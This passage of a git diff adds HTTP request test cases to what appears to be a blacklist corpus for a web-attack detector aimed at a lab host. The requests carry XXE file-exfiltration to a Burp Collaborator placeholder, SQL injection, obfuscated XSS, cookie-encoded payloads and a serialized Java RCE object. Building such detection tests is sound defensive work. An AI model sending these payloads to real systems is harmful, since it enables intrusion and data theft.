/vulnerabilities/xss_r/?name=%3C%21ENTITY+%25+file+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fhostname%22%3E+%3C%21ENTITY+%25+eval+%22%3C%21ENTITY+%26%23x25%3B+exfil+SYSTEM+%27http%3A%2F%2FBURP-COLLABORATOR-SUBDOMAIN%2F%3Fx%3D%25file%3B%27%3E%22%3E+%25eval%3B+%25exfil%3B HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21ENTITY+%25+file+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fhostname%22%3E+%3C%21ENTITY+%25+eval+%22%3C%21ENTITY+%26%23x25%3B+exfil+SYSTEM+%27http%3A%2F%2FBURP-COLLABORATOR-SUBDOMAIN%2F%3Fx%3D%25file%3B%27%3E%22%3E+%25eval%3B+%25exfil%3B Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/80/be/bbdb8e0e32f8c85298cefcb9484d.black b/testcases/80/be/bbdb8e0e32f8c85298cefcb9484d.black index 09878daa3..8a308eaa8 100644 --- a/testcases/80/be/bbdb8e0e32f8c85298cefcb9484d.black +++ b/testcases/80/be/bbdb8e0e32f8c85298cefcb9484d.black @@ -1,10 +1,9 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /vulnerabilities/sqli/?id=SELECT+pg_sleep%2810%29&Submit=Submit HTTP/1.1 Host: 10.10.3.128:2280 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=SELECT+pg_sleep%2810%29&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/84/fa/2aa76675945f87587e65e9a46e7d.black b/testcases/84/fa/2aa76675945f87587e65e9a46e7d.black index 7aea0f17a..602bd4e48 100644 --- a/testcases/84/fa/2aa76675945f87587e65e9a46e7d.black +++ b/testcases/84/fa/2aa76675945f87587e65e9a46e7d.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /vulnerabilities/xss_r/?name=top%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=top%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/86/bf/4c7ba37fabf025ec46e402f3af2a.black b/testcases/86/bf/4c7ba37fabf025ec46e402f3af2a.black index 0bc4cf90d..b4795b04c 100644 --- a/testcases/86/bf/4c7ba37fabf025ec46e402f3af2a.black +++ b/testcases/86/bf/4c7ba37fabf025ec46e402f3af2a.black @@ -1,11 +1,10 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?JTI1MjhzZWxlY3QlMjUyMGV4dHJhY3R2YWx1ZSUyNTI4eG1sdHlwZSUyNTI4JTI1MjclMjUzQyUyNTNGeG1sJTI1MjB2ZXJzaW9uJTI1M0QlMjUyMjEuMCUyNTIyJTI1MjBlbmNvZGluZyUyNTNEJTI1MjJVVEYtOCUyNTIyJTI1M0YlMjUzRSUyNTNDJTI1MjFET0NUWVBFJTI1MjByb290JTI1MjAlMjU1QiUyNTIwJTI1M0MlMjUyMUVOVElUWSUyNTIwJTI1MjUlMjUyMHZhcG90JTI1MjBTWVNURU0lMjUyMCUyNTIyJTI1MjclMjU3QyUyNTdDJTI1MjhzZWxlY3QlMjUyMHZlcnNpb24lMjUyMGZyb20lMjUyMHYlMjUyNGluc3RhbmNlJTI1MjklMjU3QyUyNTdDJTI1MjdCdXJwJTI1MkYlMjUyMiUyNTNFJTI1MjV2YXBvdCUyNTNCJTI1NUQlMjUzRSUyNTI3JTI1MjklMjUyQyUyNTI3JTI1MkZsJTI1MjclMjUyOSUyNTIwZnJvbSUyNTIwZHVhbCUyNTI5 HTTP/1.1 Host: 10.10.3.128:2280 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Ca+href%3D%23+download%3D%22filename.html%22%3ETest%3C%2Fa%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/88/72/ae5b1506a6d1a69cb4ef626c8b04.black b/testcases/88/72/ae5b1506a6d1a69cb4ef626c8b04.black index 007f7623c..b4f1703d0 100644 --- a/testcases/88/72/ae5b1506a6d1a69cb4ef626c8b04.black +++ b/testcases/88/72/ae5b1506a6d1a69cb4ef626c8b04.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 +GET /?%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0038%5Cu0073%5Cu0065%5Cu006c%5Cu0065%5Cu0063%5Cu0074%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0065%5Cu0078%5Cu0074%5Cu0072%5Cu0061%5Cu0063%5Cu0074%5Cu0076%5Cu0061%5Cu006c%5Cu0075%5Cu0065%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0038%5Cu0078%5Cu006d%5Cu006c%5Cu0074%5Cu0079%5Cu0070%5Cu0065%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0038%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0046%5Cu0078%5Cu006d%5Cu006c%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0076%5Cu0065%5Cu0072%5Cu0073%5Cu0069%5Cu006f%5Cu006e%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0044%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0031%5Cu002e%5Cu0030%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0065%5Cu006e%5Cu0063%5Cu006f%5Cu0064%5Cu0069%5Cu006e%5Cu0067%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0044%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0055%5Cu0054%5Cu0046%5Cu002d%5Cu0038%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0046%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0045%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0031%5Cu0044%5Cu004f%5Cu0043%5Cu0054%5Cu0059%5Cu0050%5Cu0045%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0072%5Cu006f%5Cu006f%5Cu0074%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0025%5Cu0032%5Cu0035%5Cu0035%5Cu0042%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0031%5Cu0045%5Cu004e%5Cu0054%5Cu0049%5Cu0054%5Cu0059%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0035%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0076%5Cu0061%5Cu0070%5Cu006f%5Cu0074%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0053%5Cu0059%5Cu0053%5Cu0054%5Cu0045%5Cu004d%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0025%5Cu0032%5Cu0035%5Cu0037%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0037%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0038%5Cu0073%5Cu0065%5Cu006c%5Cu0065%5Cu0063%5Cu0074%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0076%5Cu0065%5Cu0072%5Cu0073%5Cu0069%5Cu006f%5Cu006e%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0076%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0034%5Cu0069%5Cu006e%5Cu0073%5Cu0074%5Cu0061%5Cu006e%5Cu0063%5Cu0065%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0039%5Cu0025%5Cu0032%5Cu0035%5Cu0037%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0037%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0042%5Cu0075%5Cu0072%5Cu0070%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0046%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0032%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0045%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0035%5Cu0076%5Cu0061%5Cu0070%5Cu006f%5Cu0074%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0042%5Cu0025%5Cu0032%5Cu0035%5Cu0035%5Cu0044%5Cu0025%5Cu0032%5Cu0035%5Cu0033%5Cu0045%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0039%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0043%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0046%5Cu006c%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0037%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0039%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0030%5Cu0064%5Cu0075%5Cu0061%5Cu006c%5Cu0025%5Cu0032%5Cu0035%5Cu0032%5Cu0039 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/89/ec/26b7057003ad7a963dfe10ae6c5d.black b/testcases/89/ec/26b7057003ad7a963dfe10ae6c5d.black index 40f80a15f..0f246bb3e 100644 --- a/testcases/89/ec/26b7057003ad7a963dfe10ae6c5d.black +++ b/testcases/89/ec/26b7057003ad7a963dfe10ae6c5d.black @@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /uc/feedback/api/v1/pc/feedback/add HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +qSKqCpjt2Khc2zp3xWlArathZXZB3kZwxj3fvikMvpxI5+g7xgkuPnyZlAa5DN9U9solP15s9JWe6WKDTdOrc8kw0EOTAtkuR+lZMWsETMkmDg6t2Pvo2UyjDM0nAuNHhj6SwP/6qnqUIrborod5T4GQrBa7jPeGVAkRHWmxUck+o76fkJeJlCTcJfEkjM1GmDZbycXWyHQs3NeBeXCKCVKiJ1wxlfyrh7xv+e3gIVTr6fnd/8FW5bFtXBAyNdycLyAbUr6TderOfYXV18501EENBsCxA4hj+IabICZ5Ro+AlaqYHeRt3CTX1F6t2r5D9snHpg8eyYcPog8ZJmzdDQrK3kzfX7aJKILHr2yOzB8cwdi22aeBRDCu94nhlvlR7fVefFUjzOvEQyA9LZ2UCtIjFvvISe2MVXM6OYalvXdFnbw6jJCRfrfO3gu8IAtJFuYb6p8tfGNVZk59rHM2yXGVw+pR66djbiDEz0VFABoeiZPB0VG76hB5szYEfwNvgYUWEQZaQKvp/gvI3+ckwNcwK8qQc0RVshQTuQs/jRcjVDR7hhEWC8+u1DZergAaV89Hf9FZzFuQzAn3Q/Bt7XVP2yyAI7Nke+aFgNDb6jl8CosvA722yIAim92Valte/0vxxbqXekVL5i05WOgRYmBjvfhseIIXYyHbHNGRlQnvkbNBNSONtLZUrUs+gzkOIpOaW+3XPF2SNKGcaJB6Gbft2YULbFbzUEPDAcpj399tQlZ3JH38iLd0jf8DITCvkIB6cOTREj6MmfEYMSSU2Wbp8fgMZAKY107yUzQpeUTHyj3ytAgwvXKLfCvhm98xGcksMQHMkBco4LcO6X9A7mazaIRsXsi5fALdGG1BfcTIohXAINmt/Ka4bIIBrqx/DXqu3UAjPsyTqnJgbuBdJxxFvsZCgYKgmR3lUJot1wpHayrIzoAKQcE3mGRnyksyXIYVxkyxrheMsQZKRhNv+X2BjJMxntw21pCiRsUxtg0RfixBQtOMO/kTOi4QcdLqtCFOUEtwOG//1LADFRxj1VQS03BMUFj4GjwCbwjSWRmT6rJO2QRCZemLVQLpH4fEzRLbPuQG8rzMQfh4NhaOyvQlxiLEmvtyzZ/AtxQ8/t/sQ5g2t9LhWDQgiwVGw8IzvBSXzxoIn7LwCgVQq1drjF2s7pB2R0nJL41jP4SLgEC8e60voCBV88eBCDv6SHgBhEeSyrBtG1nXMfDbUujJIapZlmIhDROEfgcozAna10KXDxzv7l5YgPBv9ENDAbhhUVOh3+Yd8xjGD11sEy2I0JzHRcIvVNl4N+/FQm5cITdlLGjyl7BDKP5cd5IPTqiQzb0zvnBIhZQ6EOHEa21v6F8opRUDRx0/5Zq6AxPW2i+bH5lHjj69zwf9pK2FBUAdQ1AcNisgkkRUgKJAJVbr0eITvkdTrU5xlgysjLntSUnbMjs89YiFz4RtJGSViToJ2VVrfsH2mzKL+0C3GLkm6WDxI0kg8cEHn8WC/yla9w3CYbEKL7E0l1dqw2uekyK6OtUBgkXIkCRbvHCERFAtMEScBfWHTId3awys//Q/Vs7qTbHT+wsECpN/kvOkxyw+ + diff --git a/testcases/8e/63/eece52f3a9783bc3c8dd5802b5cf.black b/testcases/8e/63/eece52f3a9783bc3c8dd5802b5cf.black index ce4537f24..48a5b8fb1 100644 --- a/testcases/8e/63/eece52f3a9783bc3c8dd5802b5cf.black +++ b/testcases/8e/63/eece52f3a9783bc3c8dd5802b5cf.black @@ -1,10 +1,10 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET / HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=this%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +Cookie: WBC-de5fbb=PFNDUklQVCBTUkM9Ly9CUlVURUxPR0lDLkNPTS5CUi8xPjwvU0NSSVBUPg== diff --git a/testcases/8e/6e/c039ad4b8aa58ed2ebcab0e08936.black b/testcases/8e/6e/c039ad4b8aa58ed2ebcab0e08936.black index b6932b32f..052fae91f 100644 --- a/testcases/8e/6e/c039ad4b8aa58ed2ebcab0e08936.black +++ b/testcases/8e/6e/c039ad4b8aa58ed2ebcab0e08936.black @@ -1,10 +1,10 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET / HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%2Fal%2F.source%2B%2Fert%2F.source%5D%28%2FXSS%2F.source%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: WBC-6bf79b=JTI3JTIyJTNFJTNDc3ZnJTJGb25sb2FkJTNEYWxlcnQlMjglMjklM0UlN0IlN0I3JTJBNyU3RCU3RA== Connection: close diff --git a/testcases/92/8e/593eb5f1b96872f6f1fe564bd7d4.black b/testcases/92/8e/593eb5f1b96872f6f1fe564bd7d4.black index c5177c16a..d43068484 100644 --- a/testcases/92/8e/593eb5f1b96872f6f1fe564bd7d4.black +++ b/testcases/92/8e/593eb5f1b96872f6f1fe564bd7d4.black @@ -1,10 +1,9 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /%3CSCRIPT%20SRC=/BRUTELOGIC.COM.BR/1%3E%3C/SCRIPT%3E HTTP/1.1 Host: 10.10.3.128:2280 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=1&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/99/cb/8bad479e3933e3e4f80a139bb8cf.black b/testcases/99/cb/8bad479e3933e3e4f80a139bb8cf.black index 0174b0e36..67b8e613b 100644 --- a/testcases/99/cb/8bad479e3933e3e4f80a139bb8cf.black +++ b/testcases/99/cb/8bad479e3933e3e4f80a139bb8cf.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?%3CSVG%20ONLOAD=%26%2397%26%23108%26%23101%26%23114%26%23116(1)%3E HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/9b/9c/eaccb2165e64c0d7c29de39f1c2c.black b/testcases/9b/9c/eaccb2165e64c0d7c29de39f1c2c.black index a01bd3810..e2cb049f8 100644 --- a/testcases/9b/9c/eaccb2165e64c0d7c29de39f1c2c.black +++ b/testcases/9b/9c/eaccb2165e64c0d7c29de39f1c2c.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /%3Csvg%20onload=alert(1)/ HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/9b/ea/0d232d76fa78412049c8048b6f25.black b/testcases/9b/ea/0d232d76fa78412049c8048b6f25.black index 4e1d08126..8b09ea859 100644 --- a/testcases/9b/ea/0d232d76fa78412049c8048b6f25.black +++ b/testcases/9b/ea/0d232d76fa78412049c8048b6f25.black @@ -1,10 +1,10 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET / HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=top%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: WBC-3fdce2=bmFtZVswKztzZWxlY3Qrc2xlZXAoOCk7OyMrK109dXNlciZwYXNzPXBhc3M= Connection: close diff --git a/testcases/9d/63/c67fbe36bf4ee152ae5af849df35.black b/testcases/9d/63/c67fbe36bf4ee152ae5af849df35.black index 12de587af..466f1c410 100644 --- a/testcases/9d/63/c67fbe36bf4ee152ae5af849df35.black +++ b/testcases/9d/63/c67fbe36bf4ee152ae5af849df35.black @@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST / HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=this%5B%2Fal%2F.source%2B%2Fert%2F.source%5D%28%2FXSS%2F.source%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +%2528select%2520extractvalue%2528xmltype%2528%2527%253C%253Fxml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%253C%2521DOCTYPE%2520root%2520%255B%2520%253C%2521ENTITY%2520%2525%2520vapot%2520SYSTEM%2520%2522%2527%257C%257C%2528select%2520version%2520from%2520v%2524instance%2529%257C%257C%2527Burp%252F%2522%253E%2525vapot%253B%255D%253E%2527%2529%252C%2527%252Fl%2527%2529%2520from%2520dual%2529 + diff --git a/testcases/9d/fb/d8758da86a7e57209ade8d184b3b.black b/testcases/9d/fb/d8758da86a7e57209ade8d184b3b.black index 189ae2046..18832edb4 100644 --- a/testcases/9d/fb/d8758da86a7e57209ade8d184b3b.black +++ b/testcases/9d/fb/d8758da86a7e57209ade8d184b3b.black @@ -1,12 +1,13 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST / HTTP/1.1 Host: 10.10.3.128:2280 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close + + +RCE + + + + + +RCE + +rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHEAfgAFcQB+AAV0AARodHRwcHh0AAdodHRwOi8veA== + + + + + + + + diff --git a/testcases/c0/89/6cbe70f48c5fd7492607415e1918.black b/testcases/c0/89/6cbe70f48c5fd7492607415e1918.black index 819872bb5..7eeee43a8 100644 --- a/testcases/c0/89/6cbe70f48c5fd7492607415e1918.black +++ b/testcases/c0/89/6cbe70f48c5fd7492607415e1918.black @@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /casmain.xgi HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close 